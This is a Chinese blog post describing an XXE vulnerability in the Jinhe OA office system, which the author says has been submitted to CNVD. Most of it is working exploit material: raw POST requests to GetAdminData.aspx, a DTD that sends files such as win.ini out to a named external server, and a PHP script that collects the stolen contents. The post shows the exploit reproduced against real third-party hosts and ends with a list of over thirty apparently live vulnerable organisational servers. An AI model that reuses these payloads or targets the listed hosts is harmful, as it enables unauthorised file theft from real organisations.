金和OA XXE漏洞分析(已提交cnvd)

金和OA XXE漏洞

漏洞路由

POST /c6/JHSoft.Web.Roles/GetAdminData.aspx/? HTTP/1.1

漏洞描述

金和OA存在xxe漏洞

电鳗岛

漏洞状态:

已提交cnvd平台,但疑似与CNVD-2024-44962重复,目前正在重新测试,并复现

xxe.dtd内容如下

<!ENTITY % all “<!ENTITY send SYSTEM ‘http://121.36.192.150:8072/get.php?file=%file;’>”>

金和OA XXE漏洞分析(已提交cnvd)插图

在服务器121.36.192.150:8072/目录下创建get.php文件

文件内容为

<?php

$data=$_GET[‘file’];

$myfile = fopen(“file.txt”, “w+”);

fwrite($myfile, $data);

fclose($myfile);

?>

金和OA XXE漏洞分析(已提交cnvd)插图1

整体流程为poc为个人服务器执行dtd与读取目标服务器的c盘文件内容

Dtd内容是XXE无回显利用方式,将内容外带到其他地方,将内容通过get.php写入file.txt

详细文章:https://blog.csdn.net/qq_61553520/article/details/137085344

快速验证存在漏洞方式

POST /c6/JHSoft.Web.Roles/GetAdminData.aspx/? HTTP/1.1

Host: 61.133.99.56:88

User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

Content-Type: application/Xml

Content-Length: 92

<!DOCTYPE root [ <!ENTITY % remote SYSTEM “http://47.109.20.177:8001/test.xml”> %remote;]>

金和OA XXE漏洞分析(已提交cnvd)插图2

下面是读取文件

POST /c6/JHSoft.Web.Roles/GetAdminData.aspx/? HTTP/1.1

Host: 61.133.99.56:88

User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

Content-Type: application/Xml

Content-Length: 198

<?xml version=”1.0″?>

<!DOCTYPE ANY[

<!ENTITY % file SYSTEM “file:///C:/Windows/win.ini”>

<!ENTITY % remote SYSTEM “http://47.109.20.177:8001/xxe.dtd”>

%remote;

%all;

]>

<root>&send;</root>

图形用户界面, 应用程序 描述已自动生成

Http://121.36.192.150:8072/file.txt

金和OA XXE漏洞分析(已提交cnvd)插图4

服务器收到请求

http://61.133.99.56:88

漏洞复现一

POST /c6/JHSoft.Web.Roles/GetAdminData.aspx/? HTTP/1.1

Host: 61.133.99.56:88

User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

Content-Type: application/Xml

Content-Length: 92

<!DOCTYPE root [ <!ENTITY % remote SYSTEM “http://47.109.20.177:8001/test.xml”> %remote;]>

图形用户界面, 应用程序 描述已自动生成

漏洞复现 二

http://123.56.162.103:88

POST /c6/JHSoft.Web.Roles/GetAdminData.aspx/? HTTP/1.1

Host: 123.56.162.103:88

User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

Content-Type: application/Xml

Content-Length: 92

<!DOCTYPE root [ <!ENTITY % remote SYSTEM “http://47.109.20.177:8001/test.xml”> %remote;]>

图形用户界面, 文本, 应用程序 描述已自动生成

漏洞复现三

http://123.233.249.254

POST /c6/JHSoft.Web.Roles/GetAdminData.aspx/? HTTP/1.1

Host: 123.233.249.254

User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95

Accept-Encoding: gzip, deflate

Accept: */*

Connection: close

Content-Type: application/Xml

Content-Length: 92

<!DOCTYPE root [ <!ENTITY % remote SYSTEM “http://47.109.20.177:8001/test.xml”> %remote;]>

图形用户界面, 应用程序 描述已自动生成

其余IP地址:

http://221.1.82.114:8088

http://oa.sdepi.com

http://eoa.sdepi.com

http://112.253.1.71:88

http://124.65.187.218:1800

http://123.233.249.254

http://it.changdajianke.com:8088

http://www.mediacone.cn

http://211.149.243.182

http://123.56.162.103:88

http://119.3.191.73

http://218.56.174.84

http://oazhongbaony.com:8081

http://222.174.117.45:82

http://oa.chinakingho.com

http://60.171.237.176

http://123.56.162.103:88

http://www.oazhongbaony.com:8081

http://60.171.237.176:81

http://tq.huaihaizzy.com:81

http://117.78.6.255

http://118.122.122.195:9088

http://61.133.99.56:88

http://ahznhg.qyznwly.com:8088

http://zjy.genesclouds.com.cn:88

http://183.242.18.158:8081

http://123.57.26.236

http://222.174.117.44

http://www.oazhongbaony.com:8081

http://115.231.60.102:8666

http://222.212.88.47:91

 

© 版权声明
THE END
喜欢就亲吻一下吧
分享
评论 抢沙发
头像
评论一下幻城的文章吧
提交
头像

昵称

取消
昵称代码图片
    blank

    暂无评论内容